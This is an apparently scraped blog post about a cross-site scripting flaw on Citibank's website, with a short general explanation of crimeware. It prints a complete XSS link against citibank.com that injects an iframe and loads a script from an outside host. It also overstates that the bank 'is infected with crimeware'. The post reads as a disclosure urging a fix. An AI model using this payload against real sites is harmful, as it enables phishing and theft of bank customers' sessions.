2772069987 e61bec33bc m Citibank is not safe   new vulnerabilitiesRecent news from xssed.com revealed a new vulnerabilities of Citibank which is count in as worlds major bank.

What is the actual problem?

Actually due to new xss vulnerabilities its very easy for a phishers to display a Citibank phishing page until their victim’s session cookie expires or gets deleted.

Citibank.com XSS and display following link on its window:
http://www.citibank.com/domain/contact/index.htm?_u=visitor&_uid=&_profile=
“/><iframesrc=http://google.com></iframe><scriptsrc=http://ha.ckers.org/xss.js?/>
&_products=NNNNNNNNNNNNNNNNN&_ll=&_mid=&_dta=&_m=0&_cn=&_j=
&_jcontext=/US&_jfp=false&BVE=https://web.da-us.citibank.com&BVP=/cgi-bin/citifi/scripts/
&BV_UseBVCookie=yes

2772069837 ae27a9de45 m Citibank is not safe   new vulnerabilities

As discovered citibank is infected with Crimeware.For those who don’t know about crime ware-

Crimeware is a class of malware designed specifically to automate financial crime.It also often has the intent to export confidential or sensitive information from a network for financial exploitation.Crimeware can enable remote access into applications, allowing hackers to break into networks for malicious purposes.It can surreptitiously install keystroke loggers to collect sensitive data—login and password information for online bank accounts.

Our source reveals that “Both flaws can be exploited by malicious people to conduct phishing attacks with a higher success rate and to infect Citibank’s clients with crimeware.”

~shout~
“Could someone inform the authority of citibank to fix this bug”